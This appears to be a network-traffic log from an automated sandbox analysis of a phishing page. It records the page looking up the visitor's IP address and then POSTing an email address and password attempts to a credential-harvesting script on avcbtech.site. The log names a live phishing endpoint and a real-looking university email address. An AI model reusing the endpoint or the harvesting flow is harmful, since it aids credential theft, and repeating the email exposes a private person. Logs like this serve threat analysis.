2025-03-24 20:29:40 UTC	1371	IN	Data Raw: 7e f8 e1 a1 87 1e ca cb cb a3 4b ba ac ac 4c 96 65 9e e7 99 c3 48 92 24 9f cf 47 9e 94 a2 a2 a2 23 47 8e dc 73 cf 3d f5 3d 70 10 5e a0 fa a1 40 92 ff eb af bf 4e 99 32 e5 f0 e1 c3 d4 2f a7 b6 6e 08 12 92 c7 1e 7b 6c c6 8c 19 b4 59 00 c9 d7 19 b5 8f bf 7b f7 ee 65 65 65 db b7 6f af ad 8f df 64 32 09 82 a0 f6 f1 53 3f 7e f8 f8 41 fd b2 7c f9 f2 91 23 47 16 14 14 50 6b 69 ba e1 a8 a7 b0 74 db 61 7d a4 14 45 39 78 f0 e0 ed b7 df de a4 49 93 7a 1d 38 08 2f 50 fd 5a 43 e1 fd a2 a2 a2 59 b3 66 ad 5e bd 3a 98 ce ad d5 62 b1 58 ee bd f7 de 09 13 26 20 1a 5c bf d0 8e 7e 72 72 72 68 3e 7e 93 c9 44 0d 96 d4 3e fe 9c 9c 1c ea c7 0f 1f 3f d0 1f bf df bf 6c d9 b2 b9 73 e7 ee dd bb 97 d5 0e b1 58 2c 0e 87 83 1e 3b 9d 4e 8a 35 92 9f 85 2e 60 45 51 44 51 6c d4 a8 51 bf 7e Data Ascii: ~KLeH$G#Gs==p^@N2/n{lY{eeeod2S?~A\|#GPkita}E9xIz8/PZCYf^:bX& \~rrrh>~D>?lsX,;N5.`EQDQlQ~
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: 6a fd e6 9b 6f d8 ce 3d 68 88 f8 fd 7e 56 a2 3c 21 21 81 1e b0 0a 3f 44 25 1f bf 06 c3 86 0d a3 8f ad a8 a8 a8 ef 33 03 0d 92 a5 4b 97 a6 a7 a7 53 05 1e 8d 2b 8d 5d a2 64 3d 65 8f 0d 06 43 62 62 22 bd da ae 5d bb e5 cb 97 d7 f7 09 01 9d 40 84 3f 00 54 63 67 e5 ca 95 9f 7f fe 39 f9 f4 6a 82 b5 cd 65 6d 2d 98 cb 6b e4 c8 91 0f 3f fc b0 d5 6a 85 71 ab e1 c2 f3 7c cb 96 2d 65 59 56 f7 e3 77 bb dd b5 ed c7 4f 1c 3b 76 4c 92 a4 bf fd ed 6f b4 4f 84 fd 1d 50 2b 96 2e 5d 3a 6d da b4 c3 87 0f 07 ac f3 a1 76 99 b2 c7 1c c7 c5 c7 c7 9f 3f 7f 5e 96 e5 ac ac ac d1 a3 47 df 7d f7 dd b8 08 63 85 fa 9e 76 44 34 1e 8f 47 51 94 bc bc bc 9b 6f be 99 fe 77 69 af f5 69 e2 4c 3d 57 d8 cc ba 53 a7 4e c7 8e 1d ab ef 53 01 75 c3 a1 43 87 fe eb bf fe 8b be 6e 5a 63 31 81 57 5f 1b Data Ascii: jo=h~V<!!?D%3KS+]d=eCbb"]@?Tcg9jem-k?jq\|-eYVwO;vLoOP+.]:mv?^G}cvD4GQowiiL=WSNSuCnZc1W_
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: be 42 20 a1 3a 36 81 2f 1f 84 15 a8 fe 5f a0 9b f5 d9 b3 67 3f f9 e4 13 ba e7 32 87 2b 9b 44 6b 7f c2 ed b7 df 7e fd f5 d7 ab df 08 a2 1e ea 9a 68 30 18 2e bd f4 d2 71 e3 c6 5d 77 dd 75 21 7c 88 d9 6c ce cb cb 5b b7 6e 5d 18 06 08 1a 12 a1 f5 cb 57 d7 d8 67 21 81 b4 b4 b4 99 33 67 3e f8 e0 83 f4 a7 28 8a 54 6d 0c 61 a4 58 06 aa ff 17 28 b8 fa d5 57 5f 9d 3c 79 92 04 5e dd 4f 5d bb 59 b5 28 8a 8d 1a 35 7a f0 c1 07 69 4a ae ee a3 0f a2 1b 8e e3 58 06 f5 35 d7 5c f3 d0 43 0f a5 a4 a4 d4 f6 43 28 ee fa d5 57 5f 51 55 47 10 83 c0 97 0f 74 00 aa ff 27 14 d2 17 45 71 e5 ca 95 ec c7 43 6d 2a 58 b1 55 ed 39 72 87 0e 1d ae bd f6 5a 0a a3 e9 38 70 50 9f b0 4b 42 10 04 7a 7c d7 5d 77 3d fc f0 c3 b5 fd 1c 59 96 39 8e db b0 61 03 25 6c 83 18 04 be 7c a0 03 50 fd 3f a1 Data Ascii: B :6/_g?2+Dk~h0.q]wu!\|l[n]Wg!3g>(TmaX(W_<y^O]Y(5ziJX5\CC(W_QUGt'EqCm*XU9rZ8pPKBz\|]w=Y9a%l\|P?
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: d0 a0 81 03 07 d2 f3 f0 e5 83 d0 80 ea 1b 28 81 bf 56 de 2a fa 8d 25 24 24 b4 6d db 56 97 01 82 86 8a cf e7 a3 1b 7d 90 f7 65 3a 8c f6 71 c3 3f 3a 10 5e c8 97 bf 7f ff fe b8 b8 38 ca c2 a3 1a ba e4 cb b7 5a ad 54 e6 ab 26 e8 56 c3 56 f9 83 06 0d 1a 3e 7c 38 7b 95 f9 f2 65 59 46 f3 5c 10 3c b8 b3 18 dc 6e 37 f5 d9 a3 1b 6e c0 58 19 a5 ee 1b 0c 86 e1 c3 87 23 b0 06 b4 d9 bb 77 2f b3 60 49 92 a4 a1 e5 14 ec 95 24 89 dc 59 8d 1b 37 d6 77 a4 a1 a0 2d 5a 31 0e f5 cb df bf 7f bf c3 e1 20 c9 af b6 5f 3e 05 17 ab 9d ea c5 c5 c5 91 ea b7 6f df fe bd f7 de 53 4b 3e 03 fd f2 41 6d c1 5a df 70 e8 d0 21 8a b6 a9 db ea 68 37 e0 a1 fb 78 46 46 06 02 6b 40 9b 9c 9c 1c 75 8a b5 46 e5 47 36 83 54 14 25 35 35 55 c7 31 d6 1a 3a 05 ab d5 4a b9 e8 f9 f9 f9 a7 4f 9f 3e 7e fc b8 Data Ascii: (V*%$$mV}e:q?:^8ZT&VV>\|8{eYF\<n7nX#w/`I$Y7w-Z1 _>oSK>AmZp!h7xFFk@uFG6T%55U1:JO>~
2025-03-24 20:29:40 UTC	1371	IN	Data Raw: fa 6a ba ef 87 61 74 b5 a3 ea 52 9e 54 9f e7 79 a3 d1 58 ab 8e c0 91 70 3a 75 88 20 08 6b d7 ae 7d e6 99 67 76 ef de 5d c9 97 af fd 46 b5 2f 9f 24 5f 51 94 aa be 7c 48 3e 08 2b 31 ad fa 05 05 05 da 5b 71 d5 92 96 96 96 98 98 18 9e 11 81 06 cc f6 ed db 47 8d 1a f5 d3 4f 3f 71 1c 17 da ea f6 96 5b 6e c9 cc cc 0c c3 d0 ea 0c 2a bb 4b 45 87 aa 0d 59 57 4b 30 db ff 0d 08 f8 f2 41 83 26 a6 27 95 05 05 05 21 dc 8f d0 5d 17 54 65 d7 ae 5d 2f bf fc f2 f7 df 7f 4f 2d 98 43 88 21 b5 6e dd fa 9e 7b ee 21 d9 88 cc d5 5e a5 08 7f 90 92 1f 4d 84 a3 5f fe 5d 77 dd 45 cf c3 97 0f f4 21 76 af 2d 49 92 42 b8 35 1b 0c 86 66 cd 9a 85 61 38 a0 01 93 97 97 37 65 ca 94 65 cb 96 51 f0 b6 a4 a4 24 84 e2 f3 dd ba 75 23 47 a8 76 ad fe fa 85 75 ac a8 94 8b ae 31 4d 89 26 cf 1e 7c f9 Data Ascii: jatRTyXp:u k}gv]F/$_Q\|H>+1[qGO?q[n*KEYWK0A&'!]Te]/O-C!n{!^M_]wE!v-IB5fa87eeQ$u#Gvu1M&\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49751	104.26.13.205	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:29:53 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:29:54 UTC	467	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:29:54 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9258ec5d9c1f49c1-EWR server-timing: cfL4;desc="?proto=TCP&rtt=108702&min_rtt=107730&rtt_var=24193&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=33648&cwnd=239&unsent_bytes=0&cid=d8c8f50ac1c522a4&ts=279&x=0"
2025-03-24 20:29:54 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49752	172.67.74.152	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:29:54 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:29:54 UTC	434	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:29:54 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9258ec618e017539-EWR server-timing: cfL4;desc="?proto=TCP&rtt=105831&min_rtt=102888&rtt_var=24801&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=36208&cwnd=240&unsent_bytes=0&cid=04b957292024af0c&ts=286&x=0"
2025-03-24 20:29:54 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49754	104.168.138.190	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:30:05 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 49 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:30:05 UTC	49	OUT	Data Raw: 61 69 3d 6b 72 69 73 74 61 2e 77 69 65 62 65 25 34 30 75 6d 61 6e 69 74 6f 62 61 2e 63 61 26 70 72 3d 50 4f 31 69 6d 51 45 34 41 25 33 42 25 37 43 Data Ascii: ai=krista.wiebe%40umanitoba.ca&pr=PO1imQE4A%3B%7C
2025-03-24 20:30:15 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:30:05 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=0a76be8bd8fbb830db9981293ff95b96; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 20:30:15 UTC	60	IN	Data Raw: 33 31 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 63 6f 72 72 65 63 74 20 70 61 73 73 77 6f 72 64 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 31{"status":"error","message":"Incorrect password"}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49755	104.26.13.205	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:30:06 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:30:06 UTC	467	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:30:06 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9258ecaaec58b2c0-EWR server-timing: cfL4;desc="?proto=TCP&rtt=108447&min_rtt=107470&rtt_var=24152&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=33709&cwnd=250&unsent_bytes=0&cid=4f840d56844ca959&ts=284&x=0"
2025-03-24 20:30:06 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49756	172.67.74.152	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:30:06 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:30:07 UTC	434	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:30:07 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9258ecae0a158cee-EWR server-timing: cfL4;desc="?proto=TCP&rtt=106645&min_rtt=105667&rtt_var=23299&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2815&recv_bytes=961&delivery_rate=35249&cwnd=241&unsent_bytes=0&cid=0b5f890b4ed9b242&ts=276&x=0"
2025-03-24 20:30:07 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49758	104.168.138.190	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:30:16 UTC	389	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:30:16 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:30:16 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=a55a58a1b05fe199d16ecb5a43f9ab60; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 20:30:16 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49761	104.168.138.190	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:30:27 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 57 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:30:27 UTC	57	OUT	Data Raw: 61 69 3d 6b 72 69 73 74 61 2e 77 69 65 62 65 25 34 30 75 6d 61 6e 69 74 6f 62 61 2e 63 61 26 70 72 3d 4d 46 56 45 25 37 43 78 25 37 42 45 48 6a 69 25 37 44 25 37 44 41 52 Data Ascii: ai=krista.wiebe%40umanitoba.ca&pr=MFVE%7Cx%7BEHji%7D%7DAR
2025-03-24 20:30:38 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:30:28 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=def14225a5e16e89cf9eeea8a9376662; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 20:30:38 UTC	60	IN	Data Raw: 33 31 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 49 6e 63 6f 72 72 65 63 74 20 70 61 73 73 77 6f 72 64 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 31{"status":"error","message":"Incorrect password"}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49764	104.26.13.205	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:30:28 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:30:28 UTC	467	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:30:28 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9258ed33ddf0c33f-EWR server-timing: cfL4;desc="?proto=TCP&rtt=103946&min_rtt=103533&rtt_var=22463&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=35553&cwnd=218&unsent_bytes=0&cid=5f94e779c58a26ec&ts=282&x=0"
2025-03-24 20:30:28 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49765	172.67.74.152	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:30:28 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:30:29 UTC	434	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:30:28 GMT Content-Type: application/json Content-Length: 20 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9258ed36ffd58c65-EWR server-timing: cfL4;desc="?proto=TCP&rtt=106487&min_rtt=106453&rtt_var=22508&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=961&delivery_rate=34962&cwnd=246&unsent_bytes=0&cid=3af8ee5c72f58ab7&ts=271&x=0"
2025-03-24 20:30:29 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49770	104.168.138.190	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:30:38 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=a55a58a1b05fe199d16ecb5a43f9ab60
2025-03-24 20:30:38 UTC	495	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:30:38 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 20:30:38 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49773	104.168.138.190	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:30:51 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 34 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:30:51 UTC	34	OUT	Data Raw: 61 69 3d 6b 72 69 73 74 61 2e 77 69 65 62 65 25 34 30 75 6d 61 6e 69 74 6f 62 61 2e 63 61 26 70 72 3d Data Ascii: ai=krista.wiebe%40umanitoba.ca&pr=
2025-03-24 20:30:52 UTC	559	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:30:51 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=f08b0a52503934c2a7f939c39c47ff1a; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-24 20:30:52 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49775	104.26.13.205	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:30:51 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 20:30:51 UTC	466	IN	HTTP/1.1 200 OK Date: Mon, 24 Mar 2025 20:30:51 GMT Content-Type: application/json Content-Length: 20 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 9258edc55aee8c23-EWR server-timing: cfL4;desc="?proto=TCP&rtt=103399&min_rtt=102470&rtt_var=22885&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4058&recv_bytes=1121&delivery_rate=9213&cwnd=217&unsent_bytes=0&cid=6c394742823e5647&ts=418&x=0"
2025-03-24 20:30:51 UTC	20	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d Data Ascii: {"ip":"161.77.13.2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49776	172.67.74.152	443	1488	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 20:30:52 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
